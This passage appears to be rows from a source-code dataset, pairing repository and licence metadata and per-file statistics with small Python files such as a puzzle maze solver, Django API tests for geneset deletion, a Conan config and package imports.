#print(pos, DIRNAMES[nextdir%4], code, newpos)
if code == 0:
if newpos not in maze.keys():
maze[newpos] = None
nextdir += 1
elif code in (1, 2):
pos = newpos
if maze.get(pos, False) == False:
pscore += 1
maze[pos] = pscore
else:
pscore = maze[pos]
nextdir -= 1
ANSWER_P2 = max([m for m in maze.values() if isinstance(m, int)])
print(ANSWER_P1)
print(ANSWER_P2)
| 28.390071 | 81 | 0.470022 | 1,134 | 8,006 | 3.277778 | 0.089065 | 0.02798 | 0.032284 | 0.031477 | 0.806833 | 0.779123 | 0.762443 | 0.762443 | 0.762443 | 0.750067 | 0 | 0.046684 | 0.325756 | 8,006 | 281 | 82 | 28.491103 | 0.641904 | 0.476393 | 0 | 0.68595 | 0 | 0 | 0.008351 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024793 | false | 0 | 0.016529 | 0 | 0.041322 | 0.066116 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a8bf0a139eae0fd3a67cfe76e9a85102b9195ccf | 128 | py | Python | CoV19/base/views.py | just-ary27/CovBot-revamp | 31af847237c4c5e7d5086a78950d06ecfd81318f | [
"MIT"
] | 1 | 2021-05-12T18:44:30.000Z | 2021-05-12T18:44:30.000Z | CoV19/base/views.py | just-ary27/CovBot-revamp | 31af847237c4c5e7d5086a78950d06ecfd81318f | [
"MIT"
] | 2 | 2021-09-22T18:41:37.000Z | 2022-02-10T09:28:52.000Z | CoV19/base/views.py | just-ary27/CovBot-revamp | 31af847237c4c5e7d5086a78950d06ecfd81318f | [
"MIT"
] | null | null | null | from django.shortcuts import render
# Create your views here.
def index(request):
return render(request,'base/index.html')
| 21.333333 | 44 | 0.757813 | 18 | 128 | 5.388889 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140625 | 128 | 5 | 45 | 25.6 | 0.881818 | 0.179688 | 0 | 0 | 0 | 0 | 0.145631 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
a8c0ae6f23a53a3960fb3870eec630317839b6ec | 139 | py | Python | python-for-beginners/03 - Comments/comments_are_not_executed.py | CloudBreadPaPa/c9-python-getting-started | c49580be5e7e88a480d05596a7a53c89d0be7dd3 | [
"MIT"
] | null | null | null | python-for-beginners/03 - Comments/comments_are_not_executed.py | CloudBreadPaPa/c9-python-getting-started | c49580be5e7e88a480d05596a7a53c89d0be7dd3 | [
"MIT"
] | null | null | null | python-for-beginners/03 - Comments/comments_are_not_executed.py | CloudBreadPaPa/c9-python-getting-started | c49580be5e7e88a480d05596a7a53c89d0be7dd3 | [
"MIT"
] | 1 | 2021-09-12T15:34:13.000Z | 2021-09-12T15:34:13.000Z | # This is a comment in my code it does nothing
# 코드의 주석이고 코드는 동작하지 않습니다.
# print('Hello world')
# print("Hello world")
# 아무 결과도 출력되지 않습니다.
| 23.166667 | 46 | 0.690647 | 25 | 139 | 3.84 | 0.84 | 0.208333 | 0.3125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.201439 | 139 | 5 | 47 | 27.8 | 0.864865 | 0.920863 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7666a4fd2f42b40394c03761fffc031a15560eb0 | 46 | py | Python | model/__init__.py | hihunjin/my_model_aiconnect | 15f519a72b246e0b93ae7083b574dc841a206b44 | [
"MIT"
] | null | null | null | model/__init__.py | hihunjin/my_model_aiconnect | 15f519a72b246e0b93ae7083b574dc841a206b44 | [
"MIT"
] | null | null | null | model/__init__.py | hihunjin/my_model_aiconnect | 15f519a72b246e0b93ae7083b574dc841a206b44 | [
"MIT"
] | null | null | null | from .get_weight import *
from .model import * | 23 | 25 | 0.76087 | 7 | 46 | 4.857143 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152174 | 46 | 2 | 26 | 23 | 0.871795 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4f18e0612ba16e8a9cc030ce7148efc0df05ce53 | 7,344 | py | Python | tests/unit/backend/corpora/api_server/test_v1_genesets.py | chanzuckerberg/corpora-data-portal | 7319e037bc91dd325d1c1bbf7febe18675d57a8c | [
"MIT"
] | 16 | 2020-05-12T23:25:51.000Z | 2021-06-17T12:04:13.000Z | tests/unit/backend/corpora/api_server/test_v1_genesets.py | chanzuckerberg/corpora-data-portal | 7319e037bc91dd325d1c1bbf7febe18675d57a8c | [
"MIT"
] | 943 | 2020-05-11T18:03:59.000Z | 2021-08-18T21:57:51.000Z | tests/unit/backend/corpora/api_server/test_v1_genesets.py | chanzuckerberg/corpora-data-portal | 7319e037bc91dd325d1c1bbf7febe18675d57a8c | [
"MIT"
] | 2 | 2020-12-19T10:04:24.000Z | 2021-06-19T12:38:23.000Z | import json
from backend.corpora.common.corpora_orm import CollectionVisibility
from backend.corpora.common.entities.geneset import GenesetDatasetLink
from tests.unit.backend.corpora.api_server.base_api_test import BaseAuthAPITest, BasicAuthAPITestCurator
from tests.unit.backend.corpora.api_server.mock_auth import get_auth_token
from tests.unit.backend.fixtures.mock_aws_test_case import CorporaTestCaseUsingMockAWS
class TestGenesets(BaseAuthAPITest, CorporaTestCaseUsingMockAWS):
def setUp(self):
# Needed for proper setUp resolution in multiple inheritance
super().setUp()
def tearDown(self):
super().tearDown()
def _get_geneset_ids(self, collection_id, headers, public=False):
if public:
rsp = self.app.get(f"/dp/v1/collections/{collection_id}", headers=headers)
else:
rsp = self.app.get(f"/dp/v1/collections/{collection_id}?visibility=PRIVATE", headers=headers)
self.assertEqual(200, rsp.status_code)
bdy = json.loads(rsp.data)
return [g["id"] for g in bdy.get("genesets", [])]
def _delete_geneset_test(self, collection_id, headers, geneset):
# get geneset
actual_geneset_ids = self._get_geneset_ids(collection_id, headers)
self.assertIn(geneset.id, actual_geneset_ids)
# delete the geneset
actual_geneset_ids = self._get_geneset_ids(collection_id, headers)
self.assertIn(geneset.id, actual_geneset_ids)
response = self.app.delete(f"/dp/v1/genesets/{geneset.id}", headers=headers)
self.assertEqual(202, response.status_code)
# try to get geneset
actual_geneset_ids = self._get_geneset_ids(collection_id, headers)
self.assertNotIn(geneset.id, actual_geneset_ids)
# Delete a seconds time
response = self.app.delete(f"/dp/v1/genesets/{geneset.id}", headers=headers)
self.assertEqual(202, response.status_code)
def test__delete_geneset_ACCEPTED(self):
"""
Delete a geneset from a private collection.
"""
headers = dict(host="localhost", Cookie=get_auth_token(self.app))
collection = self.generate_collection(
self.session, visibility=CollectionVisibility.PRIVATE, owner="test_user_id"
)
with self.subTest("With collection"):
# create a geneset
geneset = self.generate_geneset(
self.session, collection_id=collection.id, collection_visibility=collection.visibility
)
# get geneset
actual_geneset_ids = self._get_geneset_ids(collection.id, headers)
self.assertIn(geneset.id, actual_geneset_ids)
self._delete_geneset_test(collection.id, headers, geneset)
with self.subTest("With dataset"):
# create dataset
dataset = self.generate_dataset(
self.session, collection_id=collection.id, collection_visibility=collection.visibility
)
# create a geneset
geneset = self.generate_geneset(
self.session, collection_id=collection.id, collection_visibility=collection.visibility
)
GenesetDatasetLink.create(self.session, geneset.id, dataset.id)
# get geneset
actual_geneset_ids = self._get_geneset_ids(collection.id, headers)
self.assertIn(geneset.id, actual_geneset_ids)
self._delete_geneset_test(collection.id, headers, geneset)
# get dataset
response = self.app.get(f"/dp/v1/collections/{collection.id}?visibility=PRIVATE", headers=headers)
self.assertEqual(200, response.status_code)
body = json.loads(response.data)
self.assertIn(dataset.id, [d["id"] for d in body.get("datasets", [])])
def test__delete_gene_set__UNAUTHORIZED(self):
headers = dict(host="localhost", Cookie=get_auth_token(self.app))
collection = self.generate_collection(
self.session, visibility=CollectionVisibility.PRIVATE, owner="some_one_else"
)
# create a geneset
geneset = self.generate_geneset(
self.session, collection_id=collection.id, collection_visibility=collection.visibility
)
# get geneset
actual_geneset_ids = self._get_geneset_ids(collection.id, headers)
self.assertIn(geneset.id, actual_geneset_ids)
# delete the geneset
actual_geneset_ids = self._get_geneset_ids(collection.id, headers)
self.assertIn(geneset.id, actual_geneset_ids)
response = self.app.delete(f"/dp/v1/genesets/{geneset.id}", headers=headers)
self.assertEqual(403, response.status_code)
# get geneset
actual_geneset_ids = self._get_geneset_ids(collection.id, headers)
self.assertIn(geneset.id, actual_geneset_ids)
def test__delete_gene_set__NOT_ALLOWED(self):
headers = dict(host="localhost", Cookie=get_auth_token(self.app))
collection = self.generate_collection(
self.session, visibility=CollectionVisibility.PUBLIC, owner="test_user_id"
)
# create a geneset
geneset = self.generate_geneset(
self.session, collection_id=collection.id, collection_visibility=collection.visibility
)
# get geneset
actual_geneset_ids = self._get_geneset_ids(collection.id, headers, True)
self.assertIn(geneset.id, actual_geneset_ids)
# delete the geneset
actual_geneset_ids = self._get_geneset_ids(collection.id, headers, True)
self.assertIn(geneset.id, actual_geneset_ids)
response = self.app.delete(f"/dp/v1/genesets/{geneset.id}", headers=headers)
self.assertEqual(405, response.status_code)
# get geneset
actual_geneset_ids = self._get_geneset_ids(collection.id, headers, True)
self.assertIn(geneset.id, actual_geneset_ids)
class TestGenesetsCurators(BasicAuthAPITestCurator, CorporaTestCaseUsingMockAWS):
def _get_geneset_ids(self, collection_id, headers, public=False):
if public:
rsp = self.app.get(f"/dp/v1/collections/{collection_id}", headers=headers)
else:
rsp = self.app.get(f"/dp/v1/collections/{collection_id}?visibility=PRIVATE", headers=headers)
self.assertEqual(200, rsp.status_code)
bdy = json.loads(rsp.data)
return [g["id"] for g in bdy.get("genesets", [])]
def test__delete_gene_set__200(self):
headers = dict(host="localhost", Cookie=get_auth_token(self.app))
collection = self.generate_collection(
self.session, visibility=CollectionVisibility.PRIVATE, owner="some_one_else"
)
# create a geneset
geneset = self.generate_geneset(
self.session, collection_id=collection.id, collection_visibility=collection.visibility
)
# get geneset
actual_geneset_ids = self._get_geneset_ids(collection.id, headers)
self.assertIn(geneset.id, actual_geneset_ids)
# delete the geneset
actual_geneset_ids = self._get_geneset_ids(collection.id, headers)
self.assertIn(geneset.id, actual_geneset_ids)
response = self.app.delete(f"/dp/v1/genesets/{geneset.id}", headers=headers)
self.assertEqual(202, response.status_code)
| 42.450867 | 110 | 0.683415 | 859 | 7,344 | 5.614668 | 0.123399 | 0.085009 | 0.086253 | 0.062202 | 0.802198 | 0.784367 | 0.777939 | 0.763011 | 0.763011 | 0.763011 | 0 | 0.006461 | 0.22018 | 7,344 | 172 | 111 | 42.697674 | 0.835691 | 0.058279 | 0 | 0.642857 | 0 | 0 | 0.074225 | 0.053413 | 0 | 0 | 0 | 0 | 0.196429 | 1 | 0.080357 | false | 0 | 0.053571 | 0 | 0.169643 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4f9b5cdc4ed81f275e9d7100f8b7e2f71c76e1b7 | 69 | py | Python | package/__init__.py | jgorset/python-package-template | 1b0db2afbf7a8abf0e57244642515859599667ea | [
"MIT"
] | 3 | 2017-01-20T08:51:54.000Z | 2018-09-22T14:54:06.000Z | package/__init__.py | jgorset/python-package-template | 1b0db2afbf7a8abf0e57244642515859599667ea | [
"MIT"
] | null | null | null | package/__init__.py | jgorset/python-package-template | 1b0db2afbf7a8abf0e57244642515859599667ea | [
"MIT"
] | 2 | 2019-05-06T17:36:36.000Z | 2022-01-24T14:15:31.000Z | """TODO: Document your package."""
from .version import __version__
| 17.25 | 34 | 0.73913 | 8 | 69 | 5.875 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 69 | 3 | 35 | 23 | 0.783333 | 0.405797 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
96ca28de558d7c5152a031451428f2cc2f2fbb82 | 174 | py | Python | blog/extensions.py | Assist96/blog | 30d7d8a581ce87743a7059ecb18f829abd1185b6 | [
"MIT"
] | null | null | null | blog/extensions.py | Assist96/blog | 30d7d8a581ce87743a7059ecb18f829abd1185b6 | [
"MIT"
] | null | null | null | blog/extensions.py | Assist96/blog | 30d7d8a581ce87743a7059ecb18f829abd1185b6 | [
"MIT"
] | null | null | null | from flask_bootstrap import Bootstrap
from flask_sqlalchemy import SQLAlchemy
from flask_mail import Mail
from flask_ckeditor import CKEditor
from flask_moment import Moment
| 29 | 39 | 0.885057 | 25 | 174 | 5.96 | 0.32 | 0.302013 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114943 | 174 | 5 | 40 | 34.8 | 0.967532 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
96ce5ea24a2868fdbb87c58309e3e8d3cfbca726 | 23 | py | Python | elliot/recommender/visual_recommenders/VNPR/__init__.py | gategill/elliot | 113763ba6d595976e14ead2e3d460d9705cd882e | [
"Apache-2.0"
] | 175 | 2021-03-04T15:46:25.000Z | 2022-03-31T05:56:58.000Z | elliot/recommender/visual_recommenders/VNPR/__init__.py | gategill/elliot | 113763ba6d595976e14ead2e3d460d9705cd882e | [
"Apache-2.0"
] | 15 | 2021-03-06T17:53:56.000Z | 2022-03-24T17:02:07.000Z | elliot/recommender/visual_recommenders/VNPR/__init__.py | gategill/elliot | 113763ba6d595976e14ead2e3d460d9705cd882e | [
"Apache-2.0"
] | 39 | 2021-03-04T15:46:26.000Z | 2022-03-09T15:37:12.000Z | from .VNPR import VNPR
| 11.5 | 22 | 0.782609 | 4 | 23 | 4.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 23 | 1 | 23 | 23 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
96da45312ec1aa57af58ae723e6a3c3af3ffee91 | 301 | py | Python | src/models/__init__.py | RodrigoSantosRodrigues/api-jogo-da-velha-python | e03e9e2a8ea825afe2e4d82ae01fb11cf871792b | [
"MIT"
] | null | null | null | src/models/__init__.py | RodrigoSantosRodrigues/api-jogo-da-velha-python | e03e9e2a8ea825afe2e4d82ae01fb11cf871792b | [
"MIT"
] | null | null | null | src/models/__init__.py | RodrigoSantosRodrigues/api-jogo-da-velha-python | e03e9e2a8ea825afe2e4d82ae01fb11cf871792b | [
"MIT"
] | null | null | null | #src/models/__init__.py
"""
Tic-Toc-Toe
------------------------------------------------------------------------
__init__
------------------------------------------------------------------------
"""
from .VelhaModel import MovementSchema
| 30.1 | 77 | 0.232558 | 12 | 301 | 5.166667 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.245847 | 301 | 9 | 78 | 33.444444 | 0.273128 | 0.694352 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
96f67d27feb531f37b05179f2f06ca347483e0b8 | 26 | py | Python | Permit/__init__.py | howiemac/evoke4 | 5d7af36c9fb23d94766d54c9c63436343959d3a8 | [
"BSD-3-Clause"
] | null | null | null | Permit/__init__.py | howiemac/evoke4 | 5d7af36c9fb23d94766d54c9c63436343959d3a8 | [
"BSD-3-Clause"
] | null | null | null | Permit/__init__.py | howiemac/evoke4 | 5d7af36c9fb23d94766d54c9c63436343959d3a8 | [
"BSD-3-Clause"
] | null | null | null | from Permit import Permit
| 13 | 25 | 0.846154 | 4 | 26 | 5.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 26 | 1 | 26 | 26 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8c4edc7eb77123cf777a768192ed4eb0f918e25c | 57 | py | Python | run/module/__init__.py | run-hub/run | 67072c4e837982aca4962f006c7eb180337e8ebc | [
"Unlicense"
] | 1 | 2016-01-14T19:37:31.000Z | 2016-01-14T19:37:31.000Z | run/module/__init__.py | roll/run | 67072c4e837982aca4962f006c7eb180337e8ebc | [
"Unlicense"
] | null | null | null | run/module/__init__.py | roll/run | 67072c4e837982aca4962f006c7eb180337e8ebc | [
"Unlicense"
] | null | null | null | from .converter import module
from .module import Module
| 19 | 29 | 0.824561 | 8 | 57 | 5.875 | 0.5 | 0.510638 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140351 | 57 | 2 | 30 | 28.5 | 0.959184 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8c514803defd8e3e7cdb970f07f39ef1470b62e2 | 82 | py | Python | simulation/__init__.py | OwlQuant/Simulation | d1e9285d273570773c61efd8e2a90e6af5528285 | [
"MIT"
] | null | null | null | simulation/__init__.py | OwlQuant/Simulation | d1e9285d273570773c61efd8e2a90e6af5528285 | [
"MIT"
] | null | null | null | simulation/__init__.py | OwlQuant/Simulation | d1e9285d273570773c61efd8e2a90e6af5528285 | [
"MIT"
] | null | null | null | from simulation.stock import StockPrice
from simulation.portfolio import Portfolio | 41 | 42 | 0.890244 | 10 | 82 | 7.3 | 0.6 | 0.383562 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085366 | 82 | 2 | 42 | 41 | 0.973333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8b18ff2a9572bdae1b0de7a8ba348b4407d61c89 | 344 | py | Python | targets/tests/config/target_conan.py | nativium/nativium | ffb603f33508c0715f824345118161e4e6970c81 | [
"MIT"
] | 5 | 2022-02-04T08:29:23.000Z | 2022-02-09T17:00:21.000Z | targets/tests/config/target_conan.py | nativium/nativium | ffb603f33508c0715f824345118161e4e6970c81 | [
"MIT"
] | null | null | null | targets/tests/config/target_conan.py | nativium/nativium | ffb603f33508c0715f824345118161e4e6970c81 | [
"MIT"
] | 1 | 2022-01-04T05:47:48.000Z | 2022-01-04T05:47:48.000Z | from conans import ConanFile
# -----------------------------------------------------------------------------
def configure(params={}):
pass
# -----------------------------------------------------------------------------
def requirements(params={}):
conanfile: ConanFile = params["conanfile"]
conanfile.requires("gtest/1.11.0")
| 24.571429 | 79 | 0.369186 | 21 | 344 | 6.047619 | 0.666667 | 0.23622 | 0.377953 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012945 | 0.101744 | 344 | 13 | 80 | 26.461538 | 0.398058 | 0.450581 | 0 | 0 | 0 | 0 | 0.112903 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0.166667 | 0.166667 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
8b29eea9147e26fe811a7ac315ad3ac8146e22d9 | 123 | py | Python | happywhale/utils/__init__.py | jianzhnie/Happywhale | e97852de3ef4d9de375ca7a1b4c3bcec0b78955f | [
"Apache-2.0"
] | null | null | null | happywhale/utils/__init__.py | jianzhnie/Happywhale | e97852de3ef4d9de375ca7a1b4c3bcec0b78955f | [
"Apache-2.0"
] | null | null | null | happywhale/utils/__init__.py | jianzhnie/Happywhale | e97852de3ef4d9de375ca7a1b4c3bcec0b78955f | [
"Apache-2.0"
] | null | null | null | '''
Author: jianzhnie
Date: 2022-03-29 18:17:00
LastEditTime: 2022-03-29 18:17:00
LastEditors: jianzhnie
Description:
'''
| 13.666667 | 33 | 0.731707 | 19 | 123 | 4.736842 | 0.631579 | 0.133333 | 0.177778 | 0.222222 | 0.311111 | 0.311111 | 0 | 0 | 0 | 0 | 0 | 0.256881 | 0.113821 | 123 | 8 | 34 | 15.375 | 0.568807 | 0.918699 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8b2ce749ae35e72d98852471c1894889b0d193bc | 20 | py | Python | tests/test_tensor/_utils/__init__.py | RichardoLuo/ColossalAI | 797a9dc5a9e801d7499b8667c3ef039a38aa15ba | [
"Apache-2.0"
] | 1,630 | 2021-10-30T01:00:27.000Z | 2022-03-31T23:02:41.000Z | tests/test_tensor/_utils/__init__.py | RichardoLuo/ColossalAI | 797a9dc5a9e801d7499b8667c3ef039a38aa15ba | [
"Apache-2.0"
] | 166 | 2021-10-30T01:03:01.000Z | 2022-03-31T14:19:07.000Z | tests/test_tensor/_utils/__init__.py | RichardoLuo/ColossalAI | 797a9dc5a9e801d7499b8667c3ef039a38aa15ba | [
"Apache-2.0"
] | 253 | 2021-10-30T06:10:29.000Z | 2022-03-31T13:30:06.000Z | from ._util import * | 20 | 20 | 0.75 | 3 | 20 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15 | 20 | 1 | 20 | 20 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8cb401906d5bf458305cea251184ac0b6dc7c9cc | 151 | py | Python | handlers/homeHandler.py | DEMON1A/WEngine | ad506e4bd5f65c32acb6eaab0667f45eb118d559 | [
"MIT"
] | 5 | 2021-03-30T23:36:03.000Z | 2022-02-01T19:25:19.000Z | handlers/homeHandler.py | DEMON1A/WEngine | ad506e4bd5f65c32acb6eaab0667f45eb118d559 | [
"MIT"
] | 7 | 2021-04-08T18:53:08.000Z | 2021-04-27T07:44:32.000Z | handlers/homeHandler.py | DEMON1A/WEngine | ad506e4bd5f65c32acb6eaab0667f45eb118d559 | [
"MIT"
] | 1 | 2021-03-30T23:36:16.000Z | 2021-03-30T23:36:16.000Z | from utils.makeResponse import returnRenderedTemplate
def Handler(requestHeaders):
return returnRenderedTemplate("WEngine/index.html", {}, 200) | 37.75 | 64 | 0.794702 | 14 | 151 | 8.571429 | 0.928571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022388 | 0.112583 | 151 | 4 | 64 | 37.75 | 0.873134 | 0 | 0 | 0 | 0 | 0 | 0.120805 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
8cd70d05a7c45ab413793b7dd08aa2043c898fbf | 232 | py | Python | TagScriptEngine/adapter/intadapter.py | djthegr8/TagScript | cbcea6b4e07f10ed9ffe665406c4c21dd9730fec | [
"CC-BY-4.0"
] | 24 | 2017-09-06T20:39:44.000Z | 2022-03-21T10:21:35.000Z | TagScriptEngine/adapter/intadapter.py | djthegr8/TagScript | cbcea6b4e07f10ed9ffe665406c4c21dd9730fec | [
"CC-BY-4.0"
] | 5 | 2021-01-01T23:07:04.000Z | 2022-02-28T13:26:43.000Z | TagScriptEngine/adapter/intadapter.py | djthegr8/TagScript | cbcea6b4e07f10ed9ffe665406c4c21dd9730fec | [
"CC-BY-4.0"
] | 20 | 2017-09-07T14:35:30.000Z | 2022-03-26T14:52:22.000Z | from .. import Verb
from ..interface import Adapter
class IntAdapter(Adapter):
def __init__(self, integer : int):
self.integer : int = integer
def get_value(self, ctx : Verb) -> str:
return str(self.integer) | 29 | 43 | 0.663793 | 30 | 232 | 4.966667 | 0.566667 | 0.221477 | 0.187919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.228448 | 232 | 8 | 44 | 29 | 0.832402 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0.285714 | 0.142857 | 0.857143 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
5075b843047190f2c389f87b6ce0ec971122a2db | 30 | py | Python | version.py | bilginfurkan/Anonimce | 7d73c13ae8d5c873b6863878370ad83ec9ee5acc | [
"Apache-2.0"
